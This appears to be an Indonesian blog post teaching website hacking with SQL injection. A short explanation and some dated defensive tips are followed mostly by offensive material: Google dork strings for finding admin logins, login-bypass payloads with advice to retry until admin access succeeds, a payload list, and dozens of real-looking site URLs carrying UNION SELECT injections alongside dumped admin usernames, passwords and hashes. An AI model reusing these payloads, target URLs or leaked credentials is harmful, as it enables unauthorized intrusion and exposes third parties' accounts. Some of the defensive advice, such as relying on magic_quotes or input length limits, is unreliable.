CARA HACKING WEBSITE DENGAN SQL INJECTION

apa sih SQL INJECTION itu ?
Pengertian SQL Injection dalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.

Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice


Contoh sintaks SQL Injection
<span>Contoh </span><span>sintak SQL dalam PHP</span>
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Penanganan SQL Injection

1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
1. Merubah script php


Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));
Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));


2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter ‘ menjadi \’ misal <span>SQL injec’tion menjadi SQL injec\’tion</span>
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input ) good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true for i = 1 to len( input )
c = mid( input, i, 1 ) if ( InStr( good_password_chars, c ) = 0 ) then validatepassword = false exit function end if next end function
Implementasi SQL Injection

1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp" "/login.asp" "/logon.asp" "/adminlogin.asp" "/adminlogon.asp" "/admin_login.asp" "/admin_logon.asp" "/admin/admin.asp" "/admin/login.asp" "/admin/logon.asp" {anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin Password : ` or `a'='a atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
dibawah ini saya akan berikan kode SQL INJECTION , kepada teman-teman hacker semua .. apabila menyukai artikel-artikel kami.. silahkan dukung halaman ini klik " suggest friends / klik saran ke teman -teman kalian " agar halaman ini penuh dengan komunitas yang ingin belajar mengenal dunia cyber hacking...
=========kode SQL INJECTION =========
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
=========================
dan dibawah ini contoh website yang pernah kami hack dengan SQL INJECTION.
=============================
http://www.caashaq.com/news_detail.php?nid=72+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2Cgroup_concat%28login%2C0x3a%2Cpassword%29%2C5%2C6%2C7 from admin--http://www.caashaq.com/admin/admin:=8z,}yn98)(%
http://www.allkisima.com/news_detail.php?nid=481+AND+1%3D2+UNION+SELECT+0%2C1%2Cgroup_concat%28login%2C0x3a%2Cpassword%29%2Cdatabase%28%29%2C4%2C5%2C6 from admin--http://www.allkisima.com/admin/admin:yaacaziz1376***7
http://www.eigeradventure.com/productdetail.php?id=2326+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2C5%2C6%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C8%2C9%2C10%2C11%2C12%2C13%2C14+from+user_eiger--http%3A%2F%2Fwww.eigeradventure.com%2Fadmin%2Fadmin%3Ay0n0ono
http://www.hybridracers.net/files/news_detail.php?id=28+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2C5%2Cgroup_concat%28login%2C0x3a%2Cpassword%29%2C7+from+login_table--http%3A%2F%2Fwww.hybridracers.net%2Fadmin%2Ffiles%2Flogin.phpevomag%3Ajapanese%2Cravi%3Asatan%2Cyanesh%3Apuryag%2Cadmin%3Aadmin
http://www.rpmpizza.com/newsdetail.php?nid=2+AND+1%3D2+UNION+SELECT+0%2C1%2Cversion%28%29%2Cgroup_concat%28user_name%2C0x3a%2Cuser_pwd%29%2C4%2C5%2C6%2C7+from+users--http%3A%2F%2Fwww.rpmpizza.com%2Fadm%2Fdomino%3Apizza
http://www.awesomejewellery.com.au/detail.php?ID=1118+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C6+from+Login--jewellery%3Agc4217
http://www.acieap.com/news_detail.php?nid=79+AND+1%3D2+UNION+SELECT+1%2Cversion%28%29%2Cgroup_concat%28user%2C0x3a%2Cpass%29%2C4 from admin--admin:5fcae8742642cea7f9b6ff81fbc02011=jpac123http://www.acieap.com/admin/
http://arindum.com/php/newsDetails.php?nid=5+AND+1%3D2+UNION+SELECT+0%2C1%2Cversion%28%29%2Cgroup_concat%28username%2C0x3a%2Cuserpassword%29%2C4%2C5+from+admin--http%3A%2F%2Farindum.com%2Fwebadmin%2F admin:adtpl
http://www.realbank.com.ph/news.php?id=27+AND+1%3D2+UNION+SELECT+0%2C1%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C3%2Cversion%28%29%2C5%2C6%2C7+from+tbl_user--http%3A%2F%2Fwww.realbank.com.ph%2Fadmin%2Frealadmin%3A3dEg5iou
http://www.sciencewithme.com/swm_adminadmin : monkeyhttp://www.sciencewithme.com/articles.php?cid=2+AND+1%3D2+UNION+SELECT+0%2C1%2Cgroup_concat%28admin%2C0x3a%2Cpass%29%2C3+from+admin--
http://horufadhi.com/news_detail.php?nid=247+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2Cgroup_concat%28id%2C0x3a%2Clogin%2C0x3a%2Cpassword%29%2C4%2C5%2C6 from admin--http://horufadhi.com/admin/1:admin:##darwiish##
http://www.solusisehat.net/berita.php?id=1047+and+1%3D2+union+select+0%2Cgroup_concat%28nama_login%2C0x3a%2Csandi%29%2C2%2C3%2C4%2C5%2C6+from+ssc_user--http%3A%2F%2Fwww.solusisehat.net%2Fadmin%2F
http://www.theglobejournal.com/detil-berita.php?id=3478+and+1%3D2+union+select+0%2C1%2C2%2C3%2Cgroup_concat%28user%2C0x3a%2Cpass%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13+from+user--http%3A%2F%2Fv2.theglobejournal.com%2Fadmin%2Findex.php
http://www.caffedangelo.com/isi.php?id=26+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2C5%2C6%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C8%2C9%2C10%2C11%2C12%2C13%2C14+from+user--aman%3Ab1n4ryd140f86ee06d118fc4aacd79a1fe0e80735abfdb%2Cuser1%3Ab1n4ryd8162f7df5f05a7802cad3a2b17dbdf2e1405027%2Cadmin%3Ab1n4ry6811f07a5ed0b8ad8970ae44b5dd2e6572fc3996http%3A%2F%2Fwww.caffedangelo.com%2Fcms%2Flogin.php
http://www.organicindonesia.org/04buletin-isi.php?id=20+AND+1%3D2+UNION+SELECT+0%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C2%2C3%2C4%2C5+from+tb_user--miryadi%3Ac28463b3f2fc4b65022609302b258f5a284ac23b%2Cadmin%3A8648d71c7dac323674e7024b31b481ae0a59d2e6%2Cariyuswanto%3A1d1fdba8cc76a3facc58226cef01e636139e416b
http://www.smk1blora.com/isi.php?id=3+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2Cversion%28%29%2C4%2Cgroup_concat%28user_name%2C0x3a%2Cuser_pass%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12+from+cni_user--admin%3ABCFYN1swXXhXMgc1DmI%3D%2Ckomeng%3AUz8MZFo1CWFXNA5p
http://ikapijogja.or.id/isi.php?id=5+and+1%3D2+union+select+0%2C1%2C2%2Cversion%28%29%2Cgroup_concat%28user_name%2C0x3a%2Cuser_pass%29%2C5%2C6%2C7%2C8%2C9%2C10+from+cni_user--superadmin%3AXTEPZwtkCGAFZg%3D%3D%2Cuser%3AXTFcNFk2DGQCYQ%3D%3D%2Cadmin%3AUT0BaQhnCGA%3D%2Clinda%3AAGxfN1s0AWlXNA%3D%3D
http://www.undana.ac.id/isi.php?id=170+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cversion%28%29%2Cgroup_concat%28user_name%2C0x3a%2Cuser_pass%29%2C13+from+cni_user--admin%3AXTEPZwtkCGAFZg%3D%3D
http://www.mobielvlaanderen.be/persberichten/artikel.php?id=163+AND+1%3D2+UNION+SELECT+0%2Cversion%28%29%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18+from+admin--admin%3Amobcel%2Cpaul%3Apb
http://marqueesole.com/php/client/product.php?id=224+AND+1%3D2+UNION+SELECT+group_concat%28idadmin%2C0x3a%2Clogin%2C0x3a%2Cpasswd%29+from+admin--admin%3A3129bbz
http://www.rayner.com/products.php?id=22+and+1%3D2+union+select+0%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2Cversion%28%29%2C9%2C10%2C11%2C12%2Cgroup_concat%28name%2C0x3a%2Cpass%29%2C14%2C15%2C16%2C17+from+auth--rayneriol%3Aridley
http://dtincr.ph/news.php?id=1+AND+1%3D2+UNION+SELECT+0%2Cgroup_concat%28user_id%2C0x3a%2Cuser_password%29+from+tbl_auth_user--admin%3Aadmin%2Cwebmaster%3A0c458fde308cd12d
http://www.tup.edu.ph/news.php?id=8+AND+1%3D2+UNION+SELECT+0%2C1%2Cversion%28%29%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+users--webadmin:*55EC63DFD8AC4F630963A13E4577474560E07796,eusores:*E3FFD4AF20224F2D11A2D45594FEB3EB088099F9,gracelauzon:*C28876CC6C08587141376E2B4C7F5A085DBADE58
http://www.inf-fni.org/pages.php?id=7+and+1%3D2+union+select+0%2C1%2C2%2C3%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11+from+administrator--cjadmin%3A0bfd3afdab4a11dea1584bee8cf7ad83%2CTnCi2010%3A634ddede18cf94cdedcd49ad54643418http%3A%2F%2Fwww.inf-fni.org%2Fadmin
http://www.crnewswire.com/news_details.php?nid=292+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2Cversion%28%29%2Cgroup_concat%28CR_U_USERID%2C0x3a%2CCR_U_PASSWORD%29%2C5+from+CR_ADMIN_USERS--http%3A%2F%2Fwww.crnewswire.com%2Fadmin%2Fadmin_login.phppchavali%3Arajah321%2Cmohan%3Amohan123%2Cnarayana%3Anarayana%2Cmohannvk%3Anandagiri%2Cjagadeesh%3A12%2Csyakaitis%3Aadmin%2Cjmorehouse%3Aeditor%2Ccandi%3Adesigner%2Clindsey%3Anetworm%2Cjchristy%3Apublisher
http://www.auditalpro.com/news_detail.php?nID=10+AND+1%3D2+UNION+SELECT+0%2Cversion%28%29%2C2%2C3%2Cdatabase%28%29%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29 from jos_users--audital_groovadmin:bb6b718fd26f0cea9f2f938e7d7a9964:cXBSGaKKroqtQoHLs87RC8NW5xUMGPBs,xxx:e35eb22cae602d94cc1559e6d05fb5d2:AfCMR5JBju0nU2YrlEMdZpXlpnNwGsbA,chalinee:a47df7f4d47f31726fc556b2060ac2ab:YMk2qZyUqczwUyUEWTalSY0YUz4prQK5,wit:4ec2519d7db71eee6b71fd2167c2f703:tMBWVurN1oR9IhYGEP95nFywsQPJsVbT,groov:f4169b18c7867643153bb0181f299277:qp2dqka0BozI7tunFYwkKR5L3KdiSIj1 http://www.auditalpro.com/cms/
----
http://www.milim.com/news.php?id=100+AND+1%3D2+UNION+SELECT+0%2Cversion%28%29%2C2%2C3%2C4%2C5%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C7+from+cms_users--andrew%3Ad914e3ecf6cc481114a3f534a5faf90b%2Cjason%3A2b877b4b825b48a9a0950dd5bd1f264d
http://www.cdtc.an/main.php?id=-6+union+select+0%2C1%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23+from+oemp_administrators--admin%3Atursi0ps%2Ccarolien%3A123NBV%2Cdolphinsuites%3Anieuwsbrief%2Csubstation%3Adolfijn07
http://www.akritec.com/backoffice/index.phpakywebadmin:adminakyweb
... ASP Bug ...http://www.antiqueoakfurniture.co.uk/category.asp?catid=14+and+1%3D2+union+select+0%2C1%2Cversion%28%29%2Cgroup_concat%28adminname%2C0x3a%2Cpassword%29%2C4%2C5%2C6%2C7%2C8%2C9+from+admin--admin%3Ahennythehoover1958
http://home.birzeit.edu/wsi/old_website/news_details.php?pid=15+AND+1%3D2+UNION+SELECT+0%2Cversion%28%29%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3c62723e%29%2C3%2C4+from+bak_users--admin%3Ae4c87c6f6ffea444734bd8bd739440c5%3ABhIDAuGOCgVgB6ufMzNI69fWnJRnubdF


Sumber: http://www.hi-techmall.org/geek/blog/cara-hacking-website-sql-injection